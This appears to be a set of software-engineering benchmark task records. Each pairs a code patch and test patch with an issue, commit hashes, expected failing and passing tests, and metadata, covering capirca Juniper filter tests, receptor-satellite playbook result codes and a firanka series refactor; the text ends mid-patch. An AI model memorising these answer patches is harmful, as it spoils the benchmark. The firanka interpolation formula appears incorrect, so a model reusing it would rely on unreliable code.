+ ('MIXED_TO_V6',
+ [[nacaddr.IPv4('0.0.0.0/1'),
+ nacaddr.IPv6('2001::/33')], [nacaddr.IPv6('2201::/48')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 2001::/33;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 2201::/48;\n' +
+ ' }'
+ ], ['0.0.0.0/1']),
+ ('V6_TO_MIXED', [[
+ nacaddr.IPv6('2201::/48')
+ ], [nacaddr.IPv4('0.0.0.0/1'),
+ nacaddr.IPv6('2001::/33')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 2201::/48;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 2001::/33;\n' +
+ ' }'
+ ], ['0.0.0.0/1']),
+ ('MIXED_TO_MIXED', [[
+ nacaddr.IPv4('0.0.0.0/1'),
+ nacaddr.IPv6('2001::/33')
+ ], [nacaddr.IPv4('192.168.0.0/24'),
+ nacaddr.IPv6('2201::/48')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 0.0.0.0/1;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 192.168.0.0/24;\n' +
+ ' }',
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 2001::/33;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 2201::/48;\n' +
+ ' }'
+ ], []),
+ ('V4_TO_V4', [[nacaddr.IPv4('0.0.0.0/1')],
+ [nacaddr.IPv4('192.168.0.0/24')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 0.0.0.0/1;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 192.168.0.0/24;\n' +
+ ' }'
+ ], []),
+ ('V6_TO_V6', [[nacaddr.IPv6('2001::/33')], [nacaddr.IPv6('2201::/48')]], [
+ ' term good-term {\n' +
+ ' from {\n' +
+ ' source-address {\n' +
+ ' 2001::/33;\n' +
+ ' }\n' +
+ ' destination-address {\n' +
+ ' 2201::/48;\n' +
+ ' }'
+ ], []),
+ (
+ 'V4_TO_V6',
+ [[nacaddr.IPv4('0.0.0.0/1')], [nacaddr.IPv6('2201::/48')]],
+ [],
+ ['0.0.0.0/1', '192.168.0.0/24', '2001::/33', '2201::/48'],
+ ),
+ (
+ 'V6_TO_V4',
+ [[nacaddr.IPv6('2001::/33')], [nacaddr.IPv4('192.168.0.0/24')]],
+ [],
+ ['0.0.0.0/1', '192.168.0.0/24', '2001::/33', '2201::/48'],
+ ),
+ (
+ 'PARTLY_UNSPECIFIED',
+ [[nacaddr.IPv6('2001::/33')], [nacaddr.IPv4('192.168.0.0/24')]],
+ ['term good_term_25 '],
+ [
+ '0.0.0.0/1', '192.168.0.0/24', '2001::/33', '2201::/48',
+ 'term good-term-both-icmp-and-icmpv6-'
+ ],
+ ),
+ )
+ def testMixed(self, addresses, expected, notexpected):
+ self.naming.GetNetAddr.side_effect = addresses
+ self.naming.GetServiceByProto.return_value = ['25']
+ jcl = juniper.Juniper(
+ policy.ParsePolicy(
+ GOOD_HEADER_MIXED + MIXED_TESTING_TERM + GOOD_TERM_25, self.naming),
+ EXP_INFO)
+ output = str(jcl)
+ for expect in expected:
+ self.assertIn(expect, output, output)
+ for notexpect in notexpected:
+ self.assertNotIn(notexpect, output, output)
+
if __name__ == '__main__':
absltest.main()
|
Support multiple targets per header
Based on https://github.com/google/capirca/wiki/Policy-format#header-section I was under the impression that a header could have multiple targets, for example:
```
header {
target:: juniper testpol4 inet
target:: juniper testpol6 inet6
}
term default {
comment:: "test"
action:: deny
}
```
But running that only outputs:
```
firewall {
family inet {
/*
** $Id:$
** $Date:$
** $Revision:$
**
*/
replace: filter testpol4 {
interface-specific;
/*
** test
*/
term default {
then {
discard;
}
}
}
}
}
```
While I would have expected both inet and inet6 filters to be generated.
I'm wondering if it's a regression, bug or was just never supported, but it would be nice to keep policy files as lean as possible.
The workaround is to do:
```
header {
target:: juniper testpol4 inet
}
#include 'testpol.inc'
header {
target:: juniper testpol6 inet6
}
#include 'testpol.inc'
```
Which is more complex and creates clutter.
What do you think?
Thanks.
|
0.0
|
2b1c3519255fa0940a464521197d80187b355570
|
[
"tests/lib/juniper_test.py::JuniperTest::testMixedMIXED_TO_MIXED",
"tests/lib/juniper_test.py::JuniperTest::testMixedMIXED_TO_V4",
"tests/lib/juniper_test.py::JuniperTest::testMixedMIXED_TO_V6",
"tests/lib/juniper_test.py::JuniperTest::testMixedPARTLY_UNSPECIFIED",
"tests/lib/juniper_test.py::JuniperTest::testMixedV4_TO_MIXED",
"tests/lib/juniper_test.py::JuniperTest::testMixedV4_TO_V4",
"tests/lib/juniper_test.py::JuniperTest::testMixedV4_TO_V6",
"tests/lib/juniper_test.py::JuniperTest::testMixedV6_TO_MIXED",
"tests/lib/juniper_test.py::JuniperTest::testMixedV6_TO_V4",
"tests/lib/juniper_test.py::JuniperTest::testMixedV6_TO_V6"
] |
[
"tests/lib/juniper_test.py::JuniperTest::testAddressExclude",
"tests/lib/juniper_test.py::JuniperTest::testArbitraryOptions",
"tests/lib/juniper_test.py::JuniperTest::testBadFilterType",
"tests/lib/juniper_test.py::JuniperTest::testBridgeFilterInetType",
"tests/lib/juniper_test.py::JuniperTest::testBridgeFilterType",
"tests/lib/juniper_test.py::JuniperTest::testBuildTokens",
"tests/lib/juniper_test.py::JuniperTest::testBuildWarningTokens",
"tests/lib/juniper_test.py::JuniperTest::testCommentShrinking",
"tests/lib/juniper_test.py::JuniperTest::testConfigHelper",
"tests/lib/juniper_test.py::JuniperTest::testDefaultDeny",
"tests/lib/juniper_test.py::JuniperTest::testDscpByte",
"tests/lib/juniper_test.py::JuniperTest::testDscpClass",
"tests/lib/juniper_test.py::JuniperTest::testDscpIPv6",
"tests/lib/juniper_test.py::JuniperTest::testDsmo",
"tests/lib/juniper_test.py::JuniperTest::testDsmoExclude",
"tests/lib/juniper_test.py::JuniperTest::testDsmoJuniperFriendly",
"tests/lib/juniper_test.py::JuniperTest::testEncapsulate",
"tests/lib/juniper_test.py::JuniperTest::testEtherType",
"tests/lib/juniper_test.py::JuniperTest::testExpiredTerm",
"tests/lib/juniper_test.py::JuniperTest::testExpiringTerm",
"tests/lib/juniper_test.py::JuniperTest::testFailEncapsulate",
"tests/lib/juniper_test.py::JuniperTest::testFailFlexibleMatch",
"tests/lib/juniper_test.py::JuniperTest::testFailIsFragmentInV6",
"tests/lib/juniper_test.py::JuniperTest::testFailNextIpMultipleIP",
"tests/lib/juniper_test.py::JuniperTest::testFailNextIpNetworkIP",
"tests/lib/juniper_test.py::JuniperTest::testFlexibleMatch",
"tests/lib/juniper_test.py::JuniperTest::testFlexibleMatchIPv6",
"tests/lib/juniper_test.py::JuniperTest::testForwardingClass",
"tests/lib/juniper_test.py::JuniperTest::testForwardingClassExcept",
"tests/lib/juniper_test.py::JuniperTest::testFragmentOffset",
"tests/lib/juniper_test.py::JuniperTest::testHopLimit",
"tests/lib/juniper_test.py::JuniperTest::testHopLimitInet",
"tests/lib/juniper_test.py::JuniperTest::testHopOptProtocol",
"tests/lib/juniper_test.py::JuniperTest::testIcmpCode",
"tests/lib/juniper_test.py::JuniperTest::testIcmpInet6Mismatch",
"tests/lib/juniper_test.py::JuniperTest::testIcmpType",
"tests/lib/juniper_test.py::JuniperTest::testIcmpv6Except",
"tests/lib/juniper_test.py::JuniperTest::testIcmpv6InetMismatch",
"tests/lib/juniper_test.py::JuniperTest::testInactiveTerm",
"tests/lib/juniper_test.py::JuniperTest::testInet6",
"tests/lib/juniper_test.py::JuniperTest::testInterfaceSpecificHeader",
"tests/lib/juniper_test.py::JuniperTest::testLongPolicer",
"tests/lib/juniper_test.py::JuniperTest::testLossPriority",
"tests/lib/juniper_test.py::JuniperTest::testMinimizePrefixes",
"tests/lib/juniper_test.py::JuniperTest::testMultipleForwardingClass",
"tests/lib/juniper_test.py::JuniperTest::testMultipleForwardingClassExcept",
"tests/lib/juniper_test.py::JuniperTest::testMultiplePrecedence",
"tests/lib/juniper_test.py::JuniperTest::testNextIp",
"tests/lib/juniper_test.py::JuniperTest::testNextIpFormat",
"tests/lib/juniper_test.py::JuniperTest::testNextIpv6",
"tests/lib/juniper_test.py::JuniperTest::testNoMatchReversal",
"tests/lib/juniper_test.py::JuniperTest::testNoVerboseV4",
"tests/lib/juniper_test.py::JuniperTest::testNoVerboseV6",
"tests/lib/juniper_test.py::JuniperTest::testNonTcpWithTcpEstablished",
"tests/lib/juniper_test.py::JuniperTest::testNotInterfaceSpecificHeader",
"tests/lib/juniper_test.py::JuniperTest::testOptions",
"tests/lib/juniper_test.py::JuniperTest::testOwnerTerm",
"tests/lib/juniper_test.py::JuniperTest::testPrecedence",
"tests/lib/juniper_test.py::JuniperTest::testPrefixList",
"tests/lib/juniper_test.py::JuniperTest::testPrefixListExcept",
"tests/lib/juniper_test.py::JuniperTest::testPrefixListMixed",
"tests/lib/juniper_test.py::JuniperTest::testProtocolCase",
"tests/lib/juniper_test.py::JuniperTest::testProtocolExcept",
"tests/lib/juniper_test.py::JuniperTest::testRoutingInstance",
"tests/lib/juniper_test.py::JuniperTest::testSimplifiedThenStatement",
"tests/lib/juniper_test.py::JuniperTest::testSimplifiedThenStatementWithSingleAction",
"tests/lib/juniper_test.py::JuniperTest::testSimplifiedThenStatementWithSingleActionDiscardIPv4",
"tests/lib/juniper_test.py::JuniperTest::testSimplifiedThenStatementWithSingleActionDiscardIPv6",
"tests/lib/juniper_test.py::JuniperTest::testSimplifiedThenStatementWithSingleActionRejectIPv6",
"tests/lib/juniper_test.py::JuniperTest::testTTL",
"tests/lib/juniper_test.py::JuniperTest::testTTLInet6",
"tests/lib/juniper_test.py::JuniperTest::testTcpEstablished",
"tests/lib/juniper_test.py::JuniperTest::testTermAndFilterName",
"tests/lib/juniper_test.py::JuniperTest::testTermTypeIndexKeys",
"tests/lib/juniper_test.py::JuniperTest::testTrafficClassCount",
"tests/lib/juniper_test.py::JuniperTest::testTrafficType",
"tests/lib/juniper_test.py::JuniperTest::testVerbatimTerm"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2021-04-21 13:15:37+00:00
|
apache-2.0
| 2,564
|
|
project-receptor__receptor-satellite-5
|
diff --git a/receptor_satellite/response/messages.py b/receptor_satellite/response/messages.py
index 23ee860..b16de05 100644
--- a/receptor_satellite/response/messages.py
+++ b/receptor_satellite/response/messages.py
@@ -30,12 +30,21 @@ def playbook_run_cancel_ack(playbook_run_id, status):
}
-def playbook_run_finished(host, playbook_run_id, result=RESULT_SUCCESS):
+def playbook_run_finished(
+ host,
+ playbook_run_id,
+ result=RESULT_SUCCESS,
+ connection_error=False,
+ execution_code=0,
+):
return {
+ "version": 2,
"type": "playbook_run_finished",
"playbook_run_id": playbook_run_id,
"host": host,
"status": result,
+ "connection_code": 1 if connection_error else 0,
+ "execution_code": None if connection_error else execution_code,
}
diff --git a/receptor_satellite/response/response_queue.py b/receptor_satellite/response/response_queue.py
index 4cf0f45..dc5dab0 100644
--- a/receptor_satellite/response/response_queue.py
+++ b/receptor_satellite/response/response_queue.py
@@ -15,9 +15,18 @@ class ResponseQueue:
)
def playbook_run_finished(
- self, host, playbook_run_id, result=constants.RESULT_SUCCESS
+ self,
+ host,
+ playbook_run_id,
+ result=constants.RESULT_SUCCESS,
+ connection_error=False,
+ exit_code=0,
):
- self.queue.put(messages.playbook_run_finished(host, playbook_run_id, result))
+ self.queue.put(
+ messages.playbook_run_finished(
+ host, playbook_run_id, result, connection_error, exit_code
+ )
+ )
def playbook_run_completed(
self, playbook_run_id, status, connection_error=None, infrastructure_error=None
diff --git a/receptor_satellite/worker.py b/receptor_satellite/worker.py
index e16b45b..5140766 100644
--- a/receptor_satellite/worker.py
+++ b/receptor_satellite/worker.py
@@ -9,7 +9,8 @@ import receptor_satellite.response.constants as constants
from .run_monitor import run_monitor
# EXCEPTION means failure between capsule and the target host
-EXIT_STATUS_RE = re.compile(r"Exit status: ([0-9]+|EXCEPTION)", re.MULTILINE)
+EXIT_STATUS_RE = re.compile(r"Exit status: (([0-9]+)|EXCEPTION)", re.MULTILINE)
+UNREACHABLE_RE = re.compile(r"unreachable=[1-9][0-9]*")
def receptor_export(func):
@@ -93,6 +94,8 @@ class Host:
self.sequence = 0
self.since = None if run.config.text_update_full else 0.0
self.result = None
+ self.last_recap_line = ""
+ self.host_recap_re = re.compile(f"^.*{name}.*ok=[0-9]+")
def mark_as_failed(self, message):
queue = self.run.queue
@@ -119,16 +122,32 @@ class Host:
self.name, self.run.playbook_run_id, last_output, self.sequence
)
self.sequence += 1
+
+ possible_recaps = list(
+ filter(
+ lambda x: re.match(self.host_recap_re, x), last_output.split("\n")
+ )
+ )
+ if len(possible_recaps) > 0:
+ self.last_recap_line = possible_recaps.pop()
+
if body["complete"]:
+ connection_error = re.search(UNREACHABLE_RE, self.last_recap_line)
result = constants.HOST_RESULT_FAILURE
matches = re.findall(EXIT_STATUS_RE, last_output)
+ exit_code = None
# This means the job was already running on the host
if matches:
- # If exitcode is 0
- if matches[0] == "0":
- result = constants.HOST_RESULT_SUCCESS
- elif self.run.cancelled:
- result = constants.HOST_RESULT_CANCEL
+ code = matches[0][1]
+ # If there was an exit code
+ if code != "":
+ exit_code = int(code)
+ if exit_code == 0:
+ result = constants.HOST_RESULT_SUCCESS
+ elif self.run.cancelled:
+ result = constants.HOST_RESULT_CANCEL
+ else:
+ result = constants.HOST_RESULT_FAILURE
elif self.run.cancelled:
result = constants.HOST_RESULT_CANCEL
else:
@@ -139,6 +158,8 @@ class Host:
constants.HOST_RESULT_FAILURE
if result == constants.HOST_RESULT_INFRA_FAILURE
else result,
+ connection_error or result == constants.HOST_RESULT_INFRA_FAILURE,
+ exit_code,
)
self.result = result
break
diff --git a/setup.cfg b/setup.cfg
index 849e449..3c1f6ae 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -21,6 +21,7 @@ ignore=E201,E203,E221,E225,E231,E241,E251,E261,E265,E303,W291,W391,W293,E731,F40
exclude=.tox,venv,awx/lib/site-packages,awx/plugins/inventory,awx/ui,awx/api/urls.py,awx/main/migrations,awx/main/south_migrations,awx/main/tests/data,node_modules/,awx/projects/,tools/docker,awx/settings/local_*.py,installer/openshift/settings.py,build/,installer/
per-file-ignores =
tests/constants.py:E501
+ tests/test_run.py:E501
[metadata]
license_file=LICENSE.md
|
project-receptor/receptor-satellite
|
9c636515c06c01246641abbf4e786888d050fa9b
|
diff --git a/tests/test_response_queue.py b/tests/test_response_queue.py
index 170a8dc..d53ddef 100644
--- a/tests/test_response_queue.py
+++ b/tests/test_response_queue.py
@@ -13,7 +13,10 @@ PLAYBOOK_RUN_COMPLETED_TEST_CASES = [
),
(
("some-uuid", constants.RESULT_FAILURE, None, None),
- messages.playbook_run_completed("some-uuid", constants.RESULT_FAILURE,),
+ messages.playbook_run_completed(
+ "some-uuid",
+ constants.RESULT_FAILURE,
+ ),
),
(
("some-uuid", constants.RESULT_CANCEL, None, None),
diff --git a/tests/test_run.py b/tests/test_run.py
index 329fcb1..cfa658b 100644
--- a/tests/test_run.py
+++ b/tests/test_run.py
@@ -125,7 +125,11 @@ def poll_with_retries_scenario(request, base_scenario):
@pytest.mark.asyncio
async def test_poll_with_retries(poll_with_retries_scenario):
- (queue, host, param,) = poll_with_retries_scenario
+ (
+ queue,
+ host,
+ param,
+ ) = poll_with_retries_scenario
satellite_api = host.run.satellite_api
satellite_api.responses = [
param.api_output for _x in range(len(param.api_requests))
@@ -211,7 +215,7 @@ POLLING_LOOP_TEST_CASES = [
queue_messages=[
messages.playbook_run_update("host1", "play_id", "Exit status: 123", 0),
messages.playbook_run_finished(
- "host1", "play_id", constants.RESULT_FAILURE
+ "host1", "play_id", constants.RESULT_FAILURE, False, 123
),
],
),
@@ -226,7 +230,9 @@ POLLING_LOOP_TEST_CASES = [
api_requests=[("output", (None, 1, None))],
queue_messages=[
messages.playbook_run_update("host1", "play_id", "Exit status: 123", 0),
- messages.playbook_run_finished("host1", "play_id", constants.RESULT_CANCEL),
+ messages.playbook_run_finished(
+ "host1", "play_id", constants.RESULT_CANCEL, False, 123
+ ),
],
),
]
@@ -243,7 +249,11 @@ def polling_loop_scenario(request, base_scenario):
@pytest.mark.asyncio
async def test_polling_loop(polling_loop_scenario):
- (queue, host, param,) = polling_loop_scenario
+ (
+ queue,
+ host,
+ param,
+ ) = polling_loop_scenario
satellite_api = host.run.satellite_api
satellite_api.responses = [
param.api_output for _x in range(len(param.api_requests))
@@ -331,7 +341,10 @@ START_TEST_CASES = [
messages.playbook_run_finished(
"host1", "play_id", constants.RESULT_SUCCESS
),
- messages.playbook_run_completed("play_id", constants.RESULT_SUCCESS,),
+ messages.playbook_run_completed(
+ "play_id",
+ constants.RESULT_SUCCESS,
+ ),
],
FakeLogger()
.info("Playbook run play_id running as job invocation 123")
@@ -369,7 +382,7 @@ START_TEST_CASES = [
0,
),
messages.playbook_run_finished(
- "host1", "play_id", constants.HOST_RESULT_FAILURE
+ "host1", "play_id", constants.HOST_RESULT_FAILURE, True
),
messages.playbook_run_completed(
"play_id",
@@ -390,16 +403,53 @@ START_TEST_CASES = [
error=None,
),
dict(
+ error=None,
body={
+ "complete": True,
"output": [
{
- "output": "Error initializing command: Net::SSH::AuthenticationFailed - Authentication failed for user root@centos-katello-3.14-0.example.com\n" # noqa: E501
+ "output": "\u001b[0;34mUsing /etc/ansible/ansible.cfg as config file\u001b[0m\n",
+ "output_type": "stdout",
+ "timestamp": 1600350676.69755,
+ },
+ {
+ "output": "\n",
+ "output_type": "stdout",
+ "timestamp": 1600350677.70155,
+ },
+ {
+ "output": "\r\nPLAY [all] *********************************************************************\n",
+ "output_type": "stdout",
+ "timestamp": 1600350677.70175,
+ },
+ {
+ "output": "\r\nTASK [Gathering Facts] *********************************************************\n",
+ "output_type": "stdout",
+ "timestamp": 1600350677.70195,
+ },
+ {
+ "output": "\n",
+ "output_type": "stdout",
+ "timestamp": 1600350677.70212,
+ },
+ {
+ "output": '\u001b[1;31mfatal: [host1]: UNREACHABLE! => {"changed": false, "msg": "Invalid/incorrect password: Permission denied, please try again.\\r\\nPermission denied, please try again.\\r\\nReceived disconnect from 10.110.156.47 port 22:2: Too many authentication failures\\r\\nDisconnected from 10.110.156.47 port 22", "unreachable": true}\u001b[0m\n',
+ "output_type": "stdout",
+ "timestamp": 1600350684.0395,
+ },
+ {
+ "output": "PLAY RECAP *********************************************************************\n\u001b[0;31mhost1\u001b[0m : ok=0 changed=0 \u001b[1;31munreachable=1 \u001b[0m failed=0 skipped=0 rescued=0 ignored=0 ",
+ "output_type": "stdout",
+ "timestamp": 1600350687.1491,
+ },
+ {
+ "output": "Exit status: 1",
+ "output_type": "stdout",
+ "timestamp": 1600350688.1491,
},
- {"output": "Exit status: EXCEPTION"},
],
- "complete": True,
+ "refresh": False,
},
- error=None,
),
],
[
@@ -411,13 +461,16 @@ START_TEST_CASES = [
messages.playbook_run_update(
"host1",
"play_id",
- "Error initializing command: Net::SSH::AuthenticationFailed - Authentication failed for user root@centos-katello-3.14-0.example.com\nExit status: EXCEPTION", # noqa: E501
+ '\x1b[0;34mUsing /etc/ansible/ansible.cfg as config file\x1b[0m\n\n\r\nPLAY [all] *********************************************************************\n\r\nTASK [Gathering Facts] *********************************************************\n\n\x1b[1;31mfatal: [host1]: UNREACHABLE! => {"changed": false, "msg": "Invalid/incorrect password: Permission denied, please try again.\\r\\nPermission denied, please try again.\\r\\nReceived disconnect from 10.110.156.47 port 22:2: Too many authentication failures\\r\\nDisconnected from 10.110.156.47 port 22", "unreachable": true}\x1b[0m\nPLAY RECAP *********************************************************************\n\x1b[0;31mhost1\x1b[0m : ok=0 changed=0 \x1b[1;31munreachable=1 \x1b[0m failed=0 skipped=0 rescued=0 ignored=0 Exit status: 1',
0,
),
messages.playbook_run_finished(
- "host1", "play_id", constants.HOST_RESULT_FAILURE
+ "host1", "play_id", constants.HOST_RESULT_FAILURE, True
+ ),
+ messages.playbook_run_completed(
+ "play_id",
+ constants.RESULT_FAILURE,
),
- messages.playbook_run_completed("play_id", constants.RESULT_FAILURE,),
],
FakeLogger()
.info("Playbook run play_id running as job invocation 123")
|
Implement v2 playbook_run_finished
[response] run playbook finished
This message is sent for each host individually when a Playbook execution on a given host finishes.
```
{
"type": "playbook_run_finished",
// id of the remediation execution
"playbook_run_id": "a30f1d7c-ba75-465b-a217-63f3f553836f",
"host": "01.example.com",
"status": "success" || "failure" || "canceled",
"version": 2,
"connection_code": 0 (success) || 1 (error),
"execution_code": 0 (success) || number (return code from ansible) || null (in case connection code is 1)
}
```
[response] run playbook finished ad1
https://bugzilla.redhat.com/show_bug.cgi?id=1833039
RHCLOUD-5370
There are certain failure situation that we know may happen (e.g. "This host is not known by Satellite"). Currently there is no way for sat-receptor to indicate these other than adding the error message into the "console" text field.
We should introduce code/error field with well-defined values so that Remediations can understand the semantics of what the problem was without having to parse the text field.
Extend playbook_run_finished
We can add a second type of failure:
- Satellite can’t reach host
- Satellite connected, but the run failed (e.g. problem in ansible playbook)
|
0.0
|
9c636515c06c01246641abbf4e786888d050fa9b
|
[
"tests/test_response_queue.py::test_playbook_run_completed[playbook_run_completed_scenario0]",
"tests/test_response_queue.py::test_playbook_run_completed[playbook_run_completed_scenario1]",
"tests/test_response_queue.py::test_playbook_run_completed[playbook_run_completed_scenario2]",
"tests/test_response_queue.py::test_playbook_run_completed[playbook_run_completed_scenario3]",
"tests/test_response_queue.py::test_playbook_run_completed[playbook_run_completed_scenario4]",
"tests/test_run.py::test_mark_as_failed",
"tests/test_run.py::test_poll_with_retries[poll_with_retries_scenario0]",
"tests/test_run.py::test_poll_with_retries[poll_with_retries_scenario1]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario0]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario1]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario2]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario3]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario4]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario5]",
"tests/test_run.py::test_hostname_sanity",
"tests/test_run.py::test_start[start_scenario0]",
"tests/test_run.py::test_start[start_scenario1]",
"tests/test_run.py::test_start[start_scenario2]",
"tests/test_run.py::test_start[start_scenario3]"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-09-18 10:31:11+00:00
|
apache-2.0
| 4,682
|
|
smok-serwis__firanka-2
|
diff --git a/README.md b/README.md
index c71f28c..f14d95a 100644
--- a/README.md
+++ b/README.md
@@ -98,6 +98,17 @@ By definition, _ModuloSeries_ has the domain of all real numbers.
Note that someOtherSeries's domain length must be non-zero and finite. Otherwise
_ValueError_ will be thrown.
+## LinearInterpolationSeries
+
+These are discretes, but allow you to define an operator that will
+take its neighbours into account and let you return a custom value.
+
+By default, it will assumes that values can be added, subbed, multed and dived,
+and will do classical linear interpolation.
+
+They can either utilize an existing discrete series, or be created just as
+any other discrete series would be.
+
## Ranges
Can be imported from _sai.ranges_.
@@ -111,9 +122,7 @@ You can create Ranges as follows:
Range(-5, 5, True, False) == Range('<-5;5)')
```
-First boolean argument signifies whether the interval is left-closed,
-and second whether it is right-closed.
-
+For more information [use the source](firanka/ranges.py#L33)
Range's are immutable and hashable. They can be sliced:
```python
@@ -134,3 +143,8 @@ Or you can check for strict inclusion
Range('<-1;1>') in Range('<-2;2>')
```
+## TimeProviders
+
+**EXPERIMENTAL**
+
+Can be imported from _sai.timeproviders_.
diff --git a/firanka/ranges.py b/firanka/ranges.py
index a2b2ae1..3e06c1e 100644
--- a/firanka/ranges.py
+++ b/firanka/ranges.py
@@ -1,9 +1,11 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
-import six
+
import functools
import math
+import six
+
__all__ = [
'Range',
'REAL_SET',
@@ -31,6 +33,16 @@ class Range(object):
self.right_inc)
def __init__(self, *args):
+ """
+ Create like:
+
+ * Range('<a;b>')
+ * Range(a, b, is_left_closed_, is_right_closed)
+ * Range(a, b) - will have both sides closed, unless one is inf
+ * Range(slice(a, b)) - will have both sides closed, unless one is None
+
+ :param args:
+ """
if len(args) == 1:
rs, = args
if isinstance(rs, type(self)):
@@ -48,6 +60,10 @@ class Range(object):
start, stop = rs[1:-1].split(';')
args = float(start), float(stop), rs[0] == '<', rs[-1] == '>'
+ elif len(args) == 2:
+ args = args[0], args[1], not math.isinf(args[0]), not math.isinf(
+ args[1])
+
q = lambda a, b, args: args[a] and math.isinf(args[b])
if q(2, 0, args) or q(3, 1, args):
@@ -65,7 +81,7 @@ class Range(object):
if isinstance(x, Range):
if ((x.start == self.start) and (x.left_inc ^ self.left_inc)) \
or ((x.stop == self.stop) and (
- x.right_inc ^ self.right_inc)):
+ x.right_inc ^ self.right_inc)):
return False
return (x.start >= self.start) and (x.stop <= self.stop)
@@ -80,15 +96,15 @@ class Range(object):
def is_empty(self):
return (self.start == self.stop) and not (
- self.left_inc or self.right_inc)
+ self.left_inc or self.right_inc)
def length(self):
return self.stop - self.start
def __repr__(self):
return 'Range(%s, %s, %s, %s)' % (
- repr(self.start), repr(self.stop), repr(self.left_inc),
- repr(self.right_inc))
+ repr(self.start), repr(self.stop), repr(self.left_inc),
+ repr(self.right_inc))
def __getitem__(self, item):
if not isinstance(item, slice):
diff --git a/firanka/series/__init__.py b/firanka/series/__init__.py
new file mode 100644
index 0000000..f738011
--- /dev/null
+++ b/firanka/series/__init__.py
@@ -0,0 +1,16 @@
+# coding=UTF-8
+from __future__ import absolute_import
+
+from .base import FunctionSeries, DiscreteSeries, Series
+from .interpolations import LinearInterpolationSeries, \
+ SCALAR_LINEAR_INTERPOLATOR
+from .modulo import ModuloSeries
+
+__all__ = [
+ 'FunctionSeries',
+ 'DiscreteSeries',
+ 'ModuloSeries',
+ 'Series',
+ 'SCALAR_LINEAR_INTERPOLATOR',
+ 'LinearInterpolationSeries',
+]
diff --git a/firanka/series.py b/firanka/series/base.py
similarity index 88%
rename from firanka/series.py
rename to firanka/series/base.py
index c1bb0cc..6182ce0 100644
--- a/firanka/series.py
+++ b/firanka/series/base.py
@@ -1,19 +1,10 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
-import math
-
import six
from firanka.exceptions import NotInDomainError
-from firanka.ranges import Range, REAL_SET, EMPTY_SET
-
-__all__ = [
- 'FunctionSeries',
- 'DiscreteSeries',
- 'ModuloSeries',
- 'Series',
-]
+from firanka.ranges import Range, EMPTY_SET
class Series(object):
@@ -286,31 +277,3 @@ class JoinedSeries(Series):
def _get_for(self, item):
return self.op(self.ser1._get_for(item), self.ser2._get_for(item))
-
-
-class ModuloSeries(Series):
- def __init__(self, series, *args, **kwargs):
- """
- Construct a modulo series
- :param series: base series to use
- :raise ValueError: invalid domain length
- """
- super(ModuloSeries, self).__init__(REAL_SET, *args, **kwargs)
-
- self.series = series
- self.period = self.series.domain.length()
-
- if self.period == 0:
- raise ValueError('Modulo series cannot have a period of 0')
- elif math.isinf(self.period):
- raise ValueError('Modulo series cannot have an infinite period')
-
- def _get_for(self, item):
- if item < 0:
- item = -(item // self.period) * self.period + item
- elif item > self.period:
- item = item - (item // self.period) * self.period
- elif item == self.period:
- item = 0
-
- return self.series._get_for(self.series.domain.start + item)
diff --git a/firanka/series/interpolations.py b/firanka/series/interpolations.py
new file mode 100644
index 0000000..178c0ff
--- /dev/null
+++ b/firanka/series/interpolations.py
@@ -0,0 +1,49 @@
+# coding=UTF-8
+from __future__ import print_function, absolute_import, division
+
+import six
+
+from .base import DiscreteSeries, Series
+
+
+def SCALAR_LINEAR_INTERPOLATOR(t0, v0, t1, v1, tt):
+ """
+ Good intepolator if our values can be added, subtracted, multiplied and divided
+ """
+ return v0 + (tt - t0) * (t1 - t0) / (v1 - v0)
+
+
+class LinearInterpolationSeries(DiscreteSeries):
+ def __init__(self, data, domain=None,
+ interpolator=SCALAR_LINEAR_INTERPOLATOR,
+ *args, **kwargs):
+ """
+ :param interpolator: callable(t0: float, v0: any, t1: float, v1: any, tt: float) -> any
+ This, given intepolation points (t0, v0) and (t1, v1) such that t0 <= tt <= t1,
+ return a value for index tt
+ :raise TypeError: a non-discrete series was passed as data
+ """
+ self.interpolator = interpolator
+ if isinstance(data, DiscreteSeries):
+ data, domain = data.data, data.domain
+ elif isinstance(data, Series):
+ raise TypeError('non-discrete series not supported!')
+
+ super(LinearInterpolationSeries, self).__init__(data, domain, *args,
+ **kwargs)
+
+ def _get_for(self, item):
+ if item == self.domain.start:
+ return self.data[0][1]
+
+ if len(self.data) == 1:
+ return super(LinearInterpolationSeries, self).__getitem__(item)
+
+ for i in six.moves.range(0, len(self.data) - 1):
+ cur_i, cur_v = self.data[i]
+ next_i, next_v = self.data[i + 1]
+
+ if cur_i <= item <= next_i:
+ return self.interpolator(cur_i, cur_v, next_i, next_v, item)
+
+ return self.data[-1][1]
diff --git a/firanka/series/modulo.py b/firanka/series/modulo.py
new file mode 100644
index 0000000..ed72808
--- /dev/null
+++ b/firanka/series/modulo.py
@@ -0,0 +1,35 @@
+# coding=UTF-8
+from __future__ import print_function, absolute_import, division
+
+import math
+
+from .base import Series
+from ..ranges import REAL_SET
+
+
+class ModuloSeries(Series):
+ def __init__(self, series, *args, **kwargs):
+ """
+ Construct a modulo series
+ :param series: base series to use
+ :raise ValueError: invalid domain length
+ """
+ super(ModuloSeries, self).__init__(REAL_SET, *args, **kwargs)
+
+ self.series = series
+ self.period = self.series.domain.length()
+
+ if self.period == 0:
